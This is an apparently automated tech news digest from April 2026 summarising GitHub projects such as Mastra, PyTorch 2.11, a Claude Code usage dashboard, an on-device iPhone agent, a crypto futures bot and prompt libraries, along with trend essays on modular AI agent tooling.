Thursday, April 9, 2026

The Git Times

“The question concerning technology is never merely technical.” — Martin Heidegger

AI Models
Claude Sonnet 4.6 $15/M GPT-5.4 $15/M Gemini 3.1 Pro $12/M Grok 4.20 $6/M DeepSeek V3.2 $0.89/M Llama 4 Maverick $0.60/M
Full Markets →

Mastra Release Strengthens Observability for TypeScript AI Apps 🔗

Latest version adds comprehensive RAG tracing, full signal export and flexible span filtering capabilities for developers

mastra-ai/mastra · TypeScript · 22.8k stars Est. 2024 · Latest: @mastra/core@1.24.0

Mastra's @mastra/core@1.24.0 release focuses on observability. It adds end-to-end RAG tracing with new span types like RAG_INGESTION, RAG_EMBEDDING, RAG_VECTOR_OPERATION, RAG_ACTION and GRAPH_ACTION. Helpers such as startRagIngestion() and withRagIngestion() simplify instrumentation, which remains opt-in through observabilityContext.

The CloudExporter now ships logs, metrics, scores and feedback in addition to traces. Configuration uses a base collector URL for automatic path derivation.

New filtering options excludeSpanTypes and spanFilter in ObservabilityInstanceConfig let teams drop noisy spans such as MODEL_CHUNK before export. This helps control costs with usage-based observability services.

Compatibility with AI SDK v6 arrives through updated MessageList support and interop helpers including toAISdkMessages().

These features augment Mastra's TypeScript-native approach to AI development. The framework offers model routing to 40+ providers, autonomous agents that reason and use tools, and graph-based workflows with .then(), .branch() and .parallel() methods.

Human-in-the-loop support pauses agents or workflows for approval, resuming from stored state. Context management incorporates history, retrieved data and memory systems.

As AI applications scale, improved tracing and cost controls matter. Mastra integrates into React, Next.js or Node.js projects or deploys standalone.

Use Cases
  • TypeScript engineers building autonomous agents with tool selection
  • Teams orchestrating graph workflows with human approval checkpoints
  • Developers adding traceable RAG pipelines to Next.js applications
Similar Projects
  • LangChain.js - offers agent patterns but with weaker tracing controls
  • Vercel AI SDK - complements Mastra on UI but skips workflow engine
  • LlamaIndex.TS - specializes in retrieval versus Mastra's full agent stack

More Stories

Python Bot Automates Binance and Bybit Futures Trading 🔗

Multi-strategy system processes signals from Telegram and TradingView with live P&L tracking

Whit1985/Binance-Futures-Signal-Bot · Python · 513 stars 3d old

A Python application released this week gives traders a complete automation layer for cryptocurrency futures. Binance-Futures-Signal-Bot connects to Binance, Bybit and OKX through their official futures APIs, executing orders based on external signals or its internal engine.

The bot receives instructions through Telegram channels, TradingView webhooks or custom REST endpoints. Users configure leverage from 1x to 125x, dynamic position sizing calculated from account equity, and a trailing stop-loss engine that adjusts in real time. All parameters live in plain configuration files, allowing rapid iteration without changing code.
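
The sizing and trailing-stop mechanics described above can be sketched in a few lines. This is an illustrative sketch, not the bot's actual code; the function names and the 1% risk figure are assumptions:

```python
def position_size(equity: float, risk_pct: float, entry: float, stop: float) -> float:
    """Size a position so a stop-out loses at most risk_pct of equity."""
    risk_amount = equity * risk_pct        # capital at risk, e.g. 1% of equity
    per_unit_loss = abs(entry - stop)      # loss per unit if the stop is hit
    return risk_amount / per_unit_loss

def trail_stop(stop: float, price: float, trail_pct: float) -> float:
    """Ratchet a long-side stop upward as price rises; never lower it."""
    return max(stop, price * (1 - trail_pct))

size = position_size(equity=10_000, risk_pct=0.01, entry=100.0, stop=98.0)
stop = 98.0
for price in (101.0, 104.0, 102.0):        # stop follows the high-water mark
    stop = trail_stop(stop, price, trail_pct=0.02)
```

With these numbers the sizer returns 50 units, and after the 104.0 tick the stop ratchets to about 101.92 and holds there when price pulls back.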

Four technical strategies run natively: EMA Crossover, RSI Divergence detection, Bollinger Band breakouts and MACD momentum signals. These can operate independently or in combination with third-party signals, giving quant developers hybrid logic without external dependencies.
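
As a rough illustration of the first strategy, an EMA crossover reduces to comparing two smoothed series. The window lengths here are arbitrary and the project's real engine is certainly more involved:

```python
def ema(prices, window):
    """Exponential moving average with smoothing factor 2 / (window + 1)."""
    k = 2 / (window + 1)
    out = [prices[0]]
    for p in prices[1:]:
        out.append(p * k + out[-1] * (1 - k))
    return out

def crossover_signal(prices, fast=3, slow=5):
    """'long' when the fast EMA crosses above the slow EMA,
    'short' on the opposite cross, else None."""
    f, s = ema(prices, fast), ema(prices, slow)
    prev, curr = f[-2] - s[-2], f[-1] - s[-1]
    if prev <= 0 < curr:
        return "long"
    if prev >= 0 > curr:
        return "short"
    return None
```

A flat series ending in a sharp jump flips the fast EMA above the slow one and yields a "long" signal; the mirror-image series yields "short".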

A rich terminal dashboard refreshes position data and P&L continuously. The built-in position manager lets users list open trades and issue manual closes from the same interface. The project requires Python 3.10+ and API keys with futures trading permissions, and runs on any machine with internet access.

For systematic traders, the value lies in removing latency and emotion between signal generation and execution while maintaining full visibility of performance across exchanges.

Use Cases
  • Crypto traders automate leveraged futures entries from Telegram signals
  • Developers integrate TradingView webhooks into multi-exchange execution engines
  • Quant funds monitor real-time P&L across Binance and Bybit positions
Similar Projects
  • Freqtrade - focuses on spot-market backtesting rather than live futures execution
  • Hummingbot - specializes in market-making instead of signal-driven directional trades
  • CCXT - supplies exchange abstractions but lacks built-in strategies and dashboard

WorldMonitor v2.5.23 Refines Geopolitical Dashboard Usability 🔗

Latest release adds drag-to-reorder world clock and resolves Tauri desktop issues

koala73/worldmonitor · TypeScript · 47.5k stars 3mo old

WorldMonitor has shipped version 2.5.23, delivering targeted usability and stability improvements to its real-time global intelligence dashboard.

The update introduces a redesigned World Clock panel with live financial city times and drag-to-reorder functionality for city rows. Desktop users running the Tauri 2 native apps on macOS, Windows or Linux benefit from fixes that resolve sidecar 401 errors, variant locking problems and registration workflow bugs. Live news fullscreen rendering now correctly layers above all UI elements, while mobile views gain collapsible maps and refined panel sizing.

At its core, the TypeScript application, built with Vite, aggregates 435 curated news feeds and synthesizes briefs through local Ollama models with no API keys required. Its dual map engine combines globe.gl with Three.js for 3D globes and deck.gl plus MapLibre GL for flat WebGL projections carrying 45 data layers. Cross-stream correlation surfaces convergence between military, economic, disaster and escalation signals. The Country Intelligence Index produces composite risk scores from 12 categories, and the finance radar tracks 92 stock exchanges alongside commodities, crypto and a seven-signal composite.
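
A composite index like the one described is, at heart, a weighted average over category scores. The sketch below is purely illustrative; the category names and weights are invented, not taken from WorldMonitor:

```python
# Hypothetical category weights (WorldMonitor's real index uses 12 categories).
CATEGORY_WEIGHTS = {
    "military": 0.3, "economic": 0.25, "disaster": 0.2,
    "political": 0.15, "cyber": 0.1,
}

def composite_risk(scores: dict) -> float:
    """Weighted average of per-category scores (each 0-100), renormalized
    over whichever categories are actually present for a country."""
    present = {c: w for c, w in CATEGORY_WEIGHTS.items() if c in scores}
    total = sum(present.values())
    return sum(scores[c] * w for c, w in present.items()) / total
```

Renormalizing over the available categories keeps scores comparable when a country has sparse data in some signal streams.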

These changes reduce daily friction in a single codebase that also generates tech, finance, commodity and happy variants. The incremental refinements keep the self-hosted situational awareness interface practical for builders who need fused open-source intelligence without external dependencies.

Use Cases
  • OSINT analysts correlating military economic and disaster signals
  • Financial traders monitoring composite risk scores across timezones
  • Infrastructure teams tracking real-time global escalation indicators
Similar Projects
  • Palantir Gotham - enterprise data fusion requiring heavy infrastructure
  • OpenCTI - graph-focused threat intel without native dual maps
  • Kibana - flexible dashboards lacking built-in geopolitical indexing

Local Dashboard Tracks Claude Code Token Usage 🔗

Python utility parses logs for costs, charts, history and progress bars using only standard library functions

phuryn/claude-usage · Python · 648 stars 1d old

A Python application converts local usage logs generated by Claude Code into a browser-based dashboard showing token counts, cost estimates and session history.

The tool reads JSONL transcripts written by the claude CLI, the VS Code extension and dispatched sessions, then loads them into an SQLite database at ~/.claude/usage.db. It works for API, Pro and Max plans. Pro and Max subscribers receive a progress bar that displays consumption against plan limits, information absent from Anthropic’s web interface.

No third-party packages are required. The project uses only sqlite3, http.server, json and pathlib, matching the Python environment already present for Claude Code users. Running python cli.py dashboard scans new logs and opens the interface at http://localhost:8080. Separate today and stats commands deliver per-model daily summaries and all-time totals.
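
The stdlib-only scanning idea can be sketched as follows: walk JSONL transcripts, pull token counts, and aggregate them in SQLite. The field names and schema here are assumptions for illustration, not the project's actual layout:

```python
import json
import sqlite3
from pathlib import Path

def scan_logs(log_dir: Path, db_path: str = ":memory:") -> sqlite3.Connection:
    """Load per-event token usage from *.jsonl transcripts into SQLite."""
    db = sqlite3.connect(db_path)
    db.execute("CREATE TABLE IF NOT EXISTS usage "
               "(model TEXT, input_tokens INTEGER, output_tokens INTEGER)")
    for path in log_dir.glob("*.jsonl"):
        for line in path.read_text().splitlines():
            event = json.loads(line)
            if "usage" not in event:          # skip non-usage events
                continue
            db.execute("INSERT INTO usage VALUES (?, ?, ?)",
                       (event.get("model", "unknown"),
                        event["usage"].get("input_tokens", 0),
                        event["usage"].get("output_tokens", 0)))
    db.commit()
    return db
```

From a table like this, per-model and all-time summaries are single GROUP BY or SUM queries.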

Cowork sessions are excluded because they produce no local transcripts. The scanner accepts a custom projects directory flag for teams working across repositories. Environment variables can set alternate host and port values.

By surfacing precise per-project and per-model data, the dashboard lets developers observe usage patterns and manage expenses without relying on incomplete vendor reports. Instructions support both Windows (python cli.py) and Unix (python3 cli.py) environments.

Use Cases
  • Software developers monitor daily Claude token usage by model
  • Teams estimate operational costs for AI coding projects
  • Pro subscribers track progress toward monthly usage limits
Similar Projects
  • openai-usage - provides API token tracking but lacks Claude-specific progress bars
  • llm-cost-monitor - focuses on multi-provider cost calculation without local log parsing
  • claude-stats-cli - terminal-only analyzer missing the web dashboard interface

Codesight Maps Codebases to Cut AI Token Waste 🔗

Universal context generator creates precise markdown files that save thousands of tokens per conversation

Houseofmvps/codesight · TypeScript · 667 stars 4d old

AI coding assistants typically waste thousands of tokens per session simply mapping a project's structure, frameworks, and dependencies. Codesight solves this with a single npx command that analyzes the entire codebase and outputs optimized context files.

The TypeScript tool delivers full abstract syntax tree precision on TypeScript projects, mapping modules, components, and relationships exactly. For the eleven other supported languages — JavaScript, Python, Go, Ruby, Elixir, Java, Kotlin, Rust, PHP, Dart, Swift, and C# — it applies pattern detection across more than 30 frameworks and 13 ORM libraries. Analysis completes in milliseconds with zero runtime dependencies.
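
Codesight's detectors are not documented here in detail, but in its simplest form, framework pattern detection amounts to matching known dependency identifiers against a project manifest. A toy sketch with invented marker names:

```python
# Invented subset of framework markers, purely for illustration.
FRAMEWORK_MARKERS = {
    "next": "Next.js", "react": "React", "django": "Django",
    "rails": "Ruby on Rails", "prisma": "Prisma (ORM)",
}

def detect_frameworks(dependencies: list) -> list:
    """Return human-readable framework names found among dependency ids."""
    found = [name for dep, name in FRAMEWORK_MARKERS.items()
             if dep in dependencies]
    return sorted(found)
```

A real detector would also inspect import statements, config files and lockfiles, but the lookup-table shape is what makes millisecond analysis with zero runtime dependencies plausible.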

Output integrates directly with Claude Code, Cursor, GitHub Copilot, OpenAI Codex, Aider, and any tool that accepts markdown. The generated files replace repetitive context-building, producing measurable token savings on every subsequent interaction.

Additional commands extend its utility. npx codesight --wiki builds a persistent knowledge base in .codesight/wiki/ compiled from AST data. The --init flag creates CLAUDE.md, .cursorrules, and AGENTS.md files tuned to each environment. Other options include --blast for change impact reports, --mcp to run as a server exposing 13 tools, and --benchmark to quantify savings.

Developed by solo founder Kailesk Khumar, the project includes 27 tests and has been validated on more than 25 open-source repositories. It treats context engineering as deterministic analysis rather than conversational overhead.

Use Cases
  • Engineers generating context for Claude Code conversations
  • Teams building persistent wiki knowledge bases from code
  • Developers analyzing blast radius before file changes
Similar Projects
  • Aider - maintains dynamic context during chats instead of pre-generating static maps
  • Continue.dev - focuses on IDE retrieval rather than standalone CLI analysis
  • RepoMap - produces basic graphs but lacks codesight's ORM and framework detectors

PhoneClaw Runs Private AI Agent on iPhone 🔗

Swift app uses Gemma 4 for completely offline calendar, contact and image tools

kellyvv/PhoneClaw · Swift · 508 stars 4d old

PhoneClaw turns iPhones into fully local AI agents that perform all reasoning on-device with Gemma 4. Written in Swift, the application maintains zero network connections by default, ensuring chats, photographs and personal data never leave the handset.

The architecture centers on a file-based skill system. Each capability is defined in a SKILL.md Markdown file, allowing new tools to be added or modified without recompiling the app. Built-in skills translate natural language into system actions: creating calendar events with title, time and location; setting timed reminders that trigger native notifications; adding or updating contacts with automatic deduplication by phone number; reading and writing the system clipboard; and translating text while detecting source language.
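
PhoneClaw itself is Swift, but the file-based idea is easy to illustrate: each SKILL.md declares a capability that is parsed at startup, so adding a skill means adding a file, not recompiling. The sketch below is Python for brevity, and the front-matter format is an assumption:

```python
from pathlib import Path

def load_skill(path: Path) -> dict:
    """Parse a minimal SKILL.md: 'key: value' header lines, then a blank
    line, then free-text instructions used to prompt the model."""
    header, _, body = path.read_text().partition("\n\n")
    meta = dict(line.split(": ", 1) for line in header.splitlines())
    meta["instructions"] = body.strip()
    return meta
```

At runtime, a router would match a user utterance against each skill's trigger metadata and hand the winning skill's instructions to the model alongside the request.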

Multimodal support lets users snap a photo or pick one from the library for on-device description, chart reading or scene analysis. Recent updates improved memory handling so inference budgets scale with actual free RAM rather than fixed prompt lengths. This keeps multi-turn tool calls stable and prevents premature truncation of long contexts or responses. A lighter Gemma 4 E2B variant runs on A16 devices for basic tasks while the E4B model delivers robust agent performance on iPhone 15 Pro and newer hardware. Models can be downloaded directly on the phone or bundled at build time.

The project demonstrates practical on-device agent design that prioritizes user privacy and extensibility within mobile memory constraints.

Use Cases
  • iPhone owners creating calendar events via natural language
  • Privacy-conscious users analyzing personal photos entirely on-device
  • Professionals managing contacts and reminders without cloud servers
Similar Projects
  • mlx-swift-examples - supplies core on-device inference but lacks extensible skill files
  • private-llm-ios - offers basic offline chat without multimodal agent capabilities
  • gemma-ios-mlx - early model ports missing stable multi-turn router and memory manager

Open Source Assembles Modular Skill Stacks for AI Agents 🔗

From reusable engineering capabilities to memory layers and real-time orchestration runtimes, developers are constructing the foundational infrastructure for autonomous agent ecosystems.

The open source community is rapidly converging on a new architectural pattern: modular, composable AI agent systems built from interchangeable skills, persistent memory primitives, orchestration frameworks, and specialized runtimes. Rather than treating large language models as isolated chat interfaces, these projects treat them as programmable entities that can acquire new capabilities, maintain state across sessions, and coordinate with other agents.

This cluster reveals a clear technical shift toward an "agent operating system." At the lowest layer are skills — encapsulated, reusable behaviors that agents can discover and invoke. Repositories like addyosmani/agent-skills, anthropics/skills, sickn33/antigravity-awesome-skills (curating 800+ capabilities), and kepano/obsidian-skills demonstrate how skills ranging from git operations to Markdown canvas manipulation are being formalized and shared. Persona-based extensions in xixu-me/awesome-persona-distill-skills further show agents adopting specialized identities ("乔布斯.skill", i.e. Steve Jobs, and "女娲.skill", i.e. Nüwa) to alter reasoning patterns.

Infrastructure projects address the harder problems of state and coordination. supermemoryai/supermemory and memvid/memvid provide high-performance, serverless memory layers that replace brittle RAG pipelines with instant retrieval and long-term recall. neomjs/neo offers a multi-threaded AI-native runtime with a persistent Scene Graph, letting agents literally introspect and mutate live application structures. risingwavelabs/risingwave delivers real-time event streaming infrastructure purpose-built for agent communication and analytics.

Orchestration and specialization complete the stack. mastra-ai/mastra, langchain-ai/deepagents, ruvnet/ruflo, and Yeachan-Heo/oh-my-claudecode enable multi-agent swarms and hierarchical task decomposition. Domain-specific implementations such as PrathamLearnsToCode/paper2code, karpathy/autoresearch, Datus-ai/Datus-agent, KeygraphHQ/shannon (autonomous pentesting), and HKUDS/CLI-Anything prove the pattern's versatility across research, data engineering, security, and interface control.

Collectively, these projects signal that open source is moving beyond prompting toward agentic primitives — standardized, discoverable components that can be mixed and matched like npm packages or Unix tools. The pattern suggests a future where building sophisticated AI systems resembles assembling microservices rather than writing monolithic prompts. By making skills, memory, and orchestration modular and community-owned, open source is democratizing the creation of agents that can autonomously handle complex software engineering, research, and operational workflows.

This infrastructural explosion around anthropics/claude-code, block/goose, and similar agent hosts indicates the ecosystem is maturing quickly, establishing the technical foundation for agents that don't just suggest code but own entire development cycles.

Use Cases
  • Engineers extending coding agents with production-grade skills
  • Researchers converting academic papers into working implementations
  • Security teams deploying autonomous web application pentesters
Similar Projects
  • CrewAI - Delivers role-based multi-agent collaboration patterns that complement the skills and orchestration focus seen here
  • LangGraph - Provides graph-based workflow construction that aligns with the memory and swarm intelligence layers in this cluster
  • AutoGen - Microsoft’s multi-agent conversation framework that these newer skills-first projects significantly extend with concrete coding and memory primitives

AI Agents Drive Evolution of Agent-Native Web Frameworks 🔗

Open source projects are redesigning web runtimes with persistent structures that AI can introspect, mutate, and control in real time.

An emerging pattern is reshaping open source: web frameworks are evolving from static rendering engines into agent-native runtimes that treat live application state as a queryable, mutable graph for AI systems. Rather than bolting AI onto existing web stacks, developers are building new foundations where large language models can directly observe, reason about, and modify application behavior without brittle DOM scraping or fragile APIs.

neo from neomjs exemplifies this shift. Its multi-threaded, AI-native engine maintains a persistent Scene Graph that allows AI agents to introspect and mutate the living structure of an application in real time. This moves beyond traditional virtual DOM approaches to create an environment explicitly designed for autonomous agents.

The same philosophy appears across the cluster. mastra, from the team behind Gatsby, delivers a modern TypeScript framework for constructing AI-powered applications and agents from the start. supermemory functions as a high-speed, scalable Memory API purpose-built for the AI era, giving agents persistent recall across web sessions. Alibaba’s page-agent takes this further by embedding a JavaScript in-page GUI agent that lets natural language commands directly control web interfaces.

Supporting infrastructure reveals the depth of the trend. SigNoz provides OpenTelemetry-native observability that can monitor both traditional metrics and complex agentic flows within these systems. Tools like KeygraphHQ/shannon (autonomous white-box AI pentester), JCodesMore/ai-website-cloner-template, and HKUDS/CLI-Anything demonstrate how web surfaces themselves are becoming programmable by agents. Even established projects like gin for high-performance Go backends and angie as an nginx replacement appear as stable foundations that new AI-native layers build upon.

Technically, this pattern replaces imperative UI paradigms with declarative, graph-based structures optimized for LLM function calling. Applications gain persistent identity beyond individual HTTP requests, enabling agents to plan, execute, observe outcomes, and self-correct across sessions. The boundary between frontend, backend, and intelligence layer dissolves.

This cluster signals where open source is heading: a web no longer built solely for humans but co-designed with autonomous agents that can read, write, debug, and evolve applications alongside human developers. The result will be faster iteration, self-healing systems, and entirely new classes of adaptive software.

Use Cases
  • AI engineers creating self-modifying web applications
  • Security teams running autonomous web vulnerability scans
  • Product teams generating interactive demos from natural language
Similar Projects
  • LangGraph - Focuses on agent orchestration but lacks neo's persistent scene graph for live UI mutation
  • Vercel v0 - Generates web components from prompts yet doesn't expose real-time agent introspection APIs
  • AutoGen - Enables multi-agent conversations but operates outside native web runtime structures like Mastra

Modular LLM Tools Drive Rise of Agentic Coding Ecosystems 🔗

From token optimizers and reusable agent skills to local multimodal engines, open source is composing practical infrastructure atop frontier models.

An emerging pattern in open source reveals a maturing LLM tooling layer focused on making large language models efficient, extensible, and truly agentic for software development. Rather than competing with frontier model providers, these projects supply the specialized components—context managers, execution primitives, memory layers, and hardware accelerators—that turn raw model access into reliable workflows.

Token efficiency has become a foundational concern. rtk-ai/rtk uses a dependency-free Rust binary to proxy common developer commands, cutting token usage by 60-90%. Houseofmvps/codesight generates compact context representations that work across Claude Code, Cursor, Copilot and similar tools. router-for-me/CLIProxyAPI wraps multiple vendor CLIs into a single OpenAI-compatible service, letting teams route work to free tiers of Gemini, Claude, or Qwen without changing upstream code.

A second cluster revolves around agent primitives, especially around Anthropic’s terminal-native anthropics/claude-code. The pattern is clear in hesreallyhim/awesome-claude-code, sickn33/antigravity-awesome-skills (cataloging 800+ tested skills), and anthropics/skills. These repositories treat agent capabilities as reusable modules—slash commands, git orchestration, test execution—that any downstream tool can import. block/goose (Rust) and ruvnet/ruflo push further, offering extensible agents and distributed swarm orchestration with native RAG and memory. mastra-ai/mastra, from the Gatsby team, supplies a full TypeScript framework for building such agents with modern web stacks.

Local and multimodal execution completes the picture. mattmireles/gemma-tuner-multimodal demonstrates fine-tuning Gemma 3n and 4 with audio, images, and text directly on Apple Silicon using Metal Performance Shaders. Blaizzy/mlx-vlm and zml/zml (Zig/MLIR) target “any model, any hardware” without compromise. Memory bottlenecks are addressed by memvid/memvid, which replaces complex RAG pipelines with a single-file, serverless store. Browser-native knowledge graphs (abhigyanpatwari/GitNexus) and advanced technique notebooks (NirDiamant/RAG_Techniques) show the pattern extending beyond the terminal.

Collectively these repositories signal where open source is heading: toward composable LLM infrastructure. By modularizing context handling, agent skills, local acceleration, and orchestration, the ecosystem is shifting from novelty chat interfaces to production-grade, cost-aware autonomous coding systems that run on laptops, clusters, or entirely in-browser. The focus has moved from training bigger models to engineering the plumbing that makes them practical everywhere.

This tooling layer—small, focused, and interoperable—will likely define the next wave of AI-native development.

Use Cases
  • Developers automating codebase navigation and edits with CLI agents
  • Engineers optimizing token spend across multiple LLM coding tools
  • Teams fine-tuning multimodal models locally on Apple Silicon
Similar Projects
  • LangGraph - Extends LangChain with stateful multi-agent graphs, mirroring ruflo's orchestration focus but in Python
  • CrewAI - Delivers role-based agent collaboration frameworks that parallel the swarm capabilities seen in this cluster
  • Ollama - Simplifies local LLM serving and matches the hardware-agnostic inference direction of zml and mlx-vlm

Deep Cuts

Transform Ideas Into Reddit Videos With One Command 🔗

Python tool automates video creation from scripts for maximum platform engagement and virality

elebumm/RedditVideoMakerBot · Python · 431 stars

In the vast expanse of GitHub repositories, few tools deliver on their promise as elegantly as RedditVideoMakerBot. This Python-powered tool lets anyone create polished Reddit videos with a single command.

The project streamlines what used to be a complex, multi-hour process. Feed it a script, select a style, and watch as it generates voice narration, pulls complementary visuals, adds synchronized captions, and exports a ready-to-upload MP4.

It's designed specifically for the unique rhythms of Reddit content — short, punchy, and highly shareable.

Builders should take note of its extensibility. The modular architecture invites customization, whether integrating cutting-edge AI models for more natural voices or developing templates for specific subreddit aesthetics. Its potential extends beyond simple videos to full-fledged automated content factories.

This isn't just about convenience. RedditVideoMakerBot represents a shift in how digital creators work, removing technical barriers and amplifying creative output. For developers, it's an invitation to build upon a solid foundation and explore new possibilities in automated media production.

Use Cases
  • Independent creators produce narrated storytime videos for popular subreddits
  • Marketers develop promotional videos targeting niche Reddit communities
  • Developers build automated content pipelines for daily Reddit posts
Similar Projects
  • zulko/moviepy - Offers video editing library but lacks one-command automation
  • coqui-ai/TTS - Provides voice synthesis without integrated video creation
  • reddit-bot-framework - Manages Reddit API interactions but not video generation

Quick Hits

Keychron-Keyboards-Hardware-Design Builders get 100+ editable CAD models (STEP/DXF/PDF) of Keychron keyboard cases, plates, stabilizers, encoders and keycaps plus M1–M7 mice for custom mechanical projects. (495 stars)
gemma-tuner-multimodal Fine-tune Gemma 4 and 3n with audio, images and text on Apple Silicon, using PyTorch and Metal Performance Shaders. (835 stars)

PyTorch 2.11 Advances Distributed Training Features 🔗

Latest release adds differentiable collectives and FlashAttention-4 while dropping Volta GPU support

pytorch/pytorch · Python · 98.9k stars Est. 2016 · Latest: v2.11.0

PyTorch 2.11.0 introduces targeted improvements for developers working with large-scale models and modern hardware. The most significant addition is support for differentiable collectives in distributed training, permitting gradients to pass through communication primitives. This change simplifies implementation of advanced parallel algorithms that were previously difficult to differentiate end-to-end.

FlexAttention gains a FlashAttention-4 backend specifically tuned for Hopper and Blackwell GPUs, delivering measurable speedups on NVIDIA's newest architectures. Apple Silicon users receive comprehensive operator coverage on the MPS backend, while new RNN and LSTM GPU export capabilities ease deployment pipelines. XPU Graph support further extends the framework's hardware reach.

These additions arrive alongside a deliberate breaking change: CUDA 12.8 and 12.9 binaries no longer ship with Volta (SM 7.0) support. The removal reflects the industry's shift away from eight-year-old hardware and frees maintenance resources for current platforms.

The library remains anchored by its original strengths—torch tensors that mirror NumPy semantics with robust GPU acceleration, and a tape-based autograd system that enables fully dynamic neural networks. Components such as torch.nn, torch.jit, and torch.multiprocessing continue to provide flexible building blocks that integrate cleanly with existing Python scientific tooling.

The release also contains performance optimizations, bug fixes, and documentation updates. For teams running production workloads, the changes tighten the gap between research prototypes and efficient scaled deployment.

Use Cases
  • ML engineers training models with differentiable distributed collectives
  • Researchers optimizing attention layers on Hopper and Blackwell GPUs
  • Developers expanding RNN deployments across GPU and MPS backends
Similar Projects
  • TensorFlow - Static computation graphs versus PyTorch's dynamic execution
  • JAX - Functional transformations and XLA compilation without nn module
  • ONNX Runtime - Inference optimization layer rather than full training framework

More Stories

Self-Hosted Prompts Enable Private AI Consistency 🔗

Updated deployment tools let teams run isolated libraries with enterprise authentication and selective syncing

f/prompts.chat · HTML · 158.5k stars Est. 2022

prompts.chat has extended its self-hosting capabilities to address a core tension in enterprise AI adoption: balancing access to battle-tested prompts with strict data governance. The project maintains a curated, model-agnostic collection of prompt examples that work with ChatGPT, Claude, Gemini, Llama, Mistral and other systems. Organizations can now deploy fully private instances without exposing proprietary use cases.

Setup has been simplified to a single command. Running npx prompts.chat new my-prompt-library launches an interactive wizard that configures branding, themes, and authentication through GitHub, Google, or Azure AD. The resulting Next.js application can run on-premises or in private cloud environments, with Docker images provided for consistent deployment. Administrators choose whether to sync new community prompts or keep the library entirely isolated.
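
For the Docker path, a private deployment might be described with a compose file roughly like the following. The image name, port, and environment keys here are placeholders, since the wizard generates the real configuration:

```yaml
# Hypothetical compose sketch for a private instance; the actual image name
# and environment variables come from the setup wizard's output.
services:
  prompt-library:
    image: my-org/prompts-chat:latest   # placeholder image name
    ports:
      - "3000:3000"                     # Next.js default port
    environment:
      AUTH_PROVIDER: azure-ad           # GitHub, Google, or Azure AD
      COMMUNITY_SYNC: "false"           # keep the library fully isolated
```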

The underlying data remains accessible in multiple formats, including CSV and a Hugging Face dataset, allowing teams to ingest prompts into internal tools. Recent updates emphasize granular feature toggles so organizations can disable public contributions while retaining the interactive prompt engineering book and its 25 chapters on chain-of-thought reasoning, few-shot learning, and agent design.

This matters now because fragmented prompt practices across teams produce inconsistent LLM outputs and raise compliance risks. Self-hosted prompts.chat gives engineering and research groups a single source of truth they control.

Self-hosting features:

  • Wizard-driven configuration of auth and branding
  • Docker support and one-click setup
  • Optional bidirectional sync with the public library
Use Cases
  • Engineering teams deploy private prompt repos with Azure AD
  • Research labs curate model-specific prompts under data controls
  • Training departments customize interactive prompting curricula internally
Similar Projects
  • LangChain - embeds prompts in code rather than offering self-hosted libraries
  • Promptfoo - focuses on automated testing instead of community curation and hosting
  • Dify - provides visual orchestration but requires its own cloud infrastructure

Claude Cookbooks Refresh Tool Use and RAG Recipes 🔗

Recent updates deliver concrete patterns for agents, SQL queries and vector search

anthropics/claude-cookbooks · Jupyter Notebook · 37.7k stars Est. 2023

Three years after its introduction, Anthropic’s claude-cookbooks repository received fresh commits in April 2026 that expand its library of Jupyter notebooks. The updates focus on production-oriented patterns that developers can copy directly into applications built against the Claude API.

The cookbooks are organized around three themes. Capabilities notebooks demonstrate text classification, efficient summarization, and retrieval-augmented generation that grounds Claude responses in external knowledge. Tool-use sections show how to bind Claude to external functions: a customer-service agent that routes queries, a calculator for precise arithmetic, and a notebook that translates natural-language requests into validated SQL before execution.
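
The validate-before-execute step from the SQL notebook can be sketched in a few lines of stdlib Python. This is a simplified guard, not the cookbook's actual code: it refuses anything other than a single `SELECT` before running a model-generated query:

```python
import sqlite3

def run_validated_sql(conn: sqlite3.Connection, query: str) -> list:
    """Execute model-generated SQL only if it looks like a read-only SELECT."""
    if not sqlite3.complete_statement(query.rstrip().rstrip(";") + ";"):
        raise ValueError("rejected: SQL is not syntactically complete")
    first_token = query.lstrip().split(None, 1)[0].upper()
    if first_token != "SELECT":
        raise ValueError("rejected: only SELECT statements are allowed")
    # conn.execute() itself refuses multi-statement strings, which closes
    # the "SELECT 1; DROP TABLE ..." loophole.
    return conn.execute(query).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('ada')")

print(run_validated_sql(conn, "SELECT name FROM users"))  # [('ada',)]
```

In a real agent, the raised `ValueError` would be fed back to the model as a tool error so it can retry with a corrected query.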

Third-party integration recipes cover Pinecone vector databases for semantic search, live Wikipedia lookups, web-page scraping, and embedding workflows. Each notebook includes prerequisites, error-handling examples, and minimal Python code that can be adapted to any language capable of making HTTP calls to the Claude API.

These recipes matter now because organizations are moving from chat prototypes to deployed agents that must reliably call tools and cite fresh data. The community-maintained repository lowers the cost of adopting current best practices without forcing teams to rediscover common failure modes around context windows, function-calling schemas, or retrieval precision.

Contributing remains straightforward: review open issues, submit new notebooks or fixes, and avoid duplicating existing work.

Use Cases
  • Backend engineers building customer service agents with tool calling
  • Data teams implementing RAG pipelines using Pinecone vector stores
  • Analysts creating natural language interfaces for SQL database queries
Similar Projects
  • openai/openai-cookbook - provides parallel Python recipes focused on GPT models
  • langchain-ai/langchain - supplies higher-level abstractions instead of raw API patterns
  • pinecone-io/pinecone-examples - narrows scope to vector database operations only

Quick Hits

firecrawl Firecrawl turns any website into clean, structured LLM-ready data, giving AI agents reliable web intelligence without the scraping headaches. 106.2k
RAG_Techniques Master advanced RAG techniques that boost retrieval precision, context relevance, and generation quality for production-grade AI systems. 26.6k
Deep-Live-Cam Deep-Live-Cam delivers real-time face swapping and one-click video deepfakes from a single image for rapid creative prototyping. 89.4k
ColossalAI ColossalAI slashes the cost and complexity of training massive models, making frontier AI development faster and more accessible. 41.4k
ray Ray's distributed compute engine scales ML workloads across clusters with battle-tested libraries for training, tuning, and serving. 42k
supabase The Postgres development platform. Supabase gives you a dedicated Postgres database to build your web, mobile, and AI applications. 100.5k

Dynamixel SDK 4.0.4 Adds Unified CMake Build for C and C++ 🔗

Latest release modernizes compilation workflow as robotics teams demand consistent tooling across platforms and languages.

ROBOTIS-GIT/DynamixelSDK · C++ · 576 stars Est. 2016 · Latest: 4.0.4

ROBOTIS has released version 4.0.4 of its Dynamixel SDK, introducing CMakeLists.txt files that deliver a single, unified build system for both the C and C++ libraries. The update, contributed by Hyungyu Kim and dated March 2026, eliminates previous fragmentation in how developers compile the core components across Linux, Windows, and macOS environments.

